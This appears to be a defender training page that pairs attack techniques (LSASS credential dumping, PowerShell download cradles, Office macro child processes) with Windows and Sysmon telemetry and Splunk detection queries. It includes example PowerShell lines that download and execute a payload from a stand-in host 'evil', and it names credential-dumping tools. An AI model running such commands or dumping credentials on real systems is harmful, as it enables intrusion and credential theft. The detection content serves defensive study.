TRAINING DRILLS FOR DEFENDERS. EVERY ATTACK LEAVES TELEMETRY.
Each drill follows the defender's workflow: ATTACK → SYSTEM BEHAVIOR → TELEMETRY → DETECTION
Credential dumping — adversary targets LSASS process memory to extract passwords, hashes, and Kerberos tickets.
Mimikatz, Procdump, Comsvcs.dll, Task Manager (MiniDump)
A non-standard process opens a handle to lsass.exe with PROCESS_VM_READ permissions. The process then calls ReadProcessMemory to dump credential material.
| Source | Event | Key Fields |
|---|---|---|
| Sysmon | Event ID 10 (Process Access) | SourceImage, TargetImage, GrantedAccess |
index=sysmon EventCode=10
TargetImage="*\\lsass.exe"
GrantedAccess IN ("0x1010", "0x1410", "0x1438", "0x143a")
NOT SourceImage IN (
"C:\\Windows\\System32\\svchost.exe",
"C:\\Windows\\System32\\lsass.exe",
"C:\\Program Files\\*\\MsMpEng.exe"
)
| stats count by SourceImage, GrantedAccess, Computer
| where count > 0
AV/EDR products, Windows Defender, svchost, csrss. Baseline your environment first.
Tactic: Credential Access Technique: T1003.001 — OS Credential Dumping: LSASS Memory
Adversary uses PowerShell to download and execute payloads directly in memory, avoiding disk writes.
IEX (New-Object Net.WebClient).DownloadString('http://evil/payload.ps1')
IEX (iwr 'http://evil/payload.ps1').Content
powershell -enc [BASE64_ENCODED_COMMAND]
| Source | Event | Key Fields |
|---|---|---|
| Windows | 4688 (Process Creation) | CommandLine, ParentProcessName |
| PowerShell | 4104 (Script Block Logging) | ScriptBlockText |
| Sysmon | Event 1 (Process Creation) | CommandLine, ParentImage |
index=windows EventCode=4688 (CommandLine="*IEX*" AND CommandLine="*DownloadString*") OR (CommandLine="*Invoke-Expression*" AND CommandLine="*WebClient*") OR CommandLine="*powershell*-enc*" | stats count by CommandLine, ParentProcessName, Computer
Tactic: Execution Technique: T1059.001 — Command and Scripting: PowerShell
Macro-based malware creates unusual process trees. A Word document shouldn't spawn PowerShell or cmd.exe.
winword.exe → powershell.exe winword.exe → cmd.exe → powershell.exe excel.exe → mshta.exe outlook.exe → powershell.exe winword.exe → rundll32.exe
| Source | Event | Key Fields |
|---|---|---|
| Sysmon | Event 1 (Process Creation) | Image, ParentImage, CommandLine |
index=sysmon EventCode=1 ParentImage IN ( "*\\WINWORD.EXE", "*\\EXCEL.EXE", "*\\OUTLOOK.EXE", "*\\POWERPNT.EXE" ) Image IN ( "*\\powershell.exe", "*\\cmd.exe", "*\\mshta.exe", "*\\rundll32.exe", "*\\wscript.exe", "*\\cscript.exe" ) | table _time Computer ParentImage Image CommandLine
Tactic: Initial Access / Execution
Technique: T1566.001 — Phishing: Spearphishing Attachment
T1204.002 — User Execution: Malicious File
Logs are frame data for attackers. Know your telemetry.
| Source | Event | What It Shows | Defends Against |
|---|---|---|---|
| Sysmon 1 | Process Creation | What ran, who spawned it, command line | LOLBins, malware execution |
| Sysmon 3 | Network Connection | Process making network calls | C2 beaconing, data exfil |
| Sysmon 10 | Process Access | Cross-process memory access | Credential dumping, injection |
| Sysmon 11 | File Create | New files written to disk | Payload drops, persistence |
| Sysmon 13 | Registry Value Set | Registry modifications | Persistence, config changes |
| Win 4688 | Process Creation | Process + command line (if enabled) | General execution monitoring |
| PS 4104 | Script Block | Deobfuscated PowerShell code | Obfuscated attacks, cradles |
ADVERSARY ARCADE — Detection Dojo
fungiknight © 2026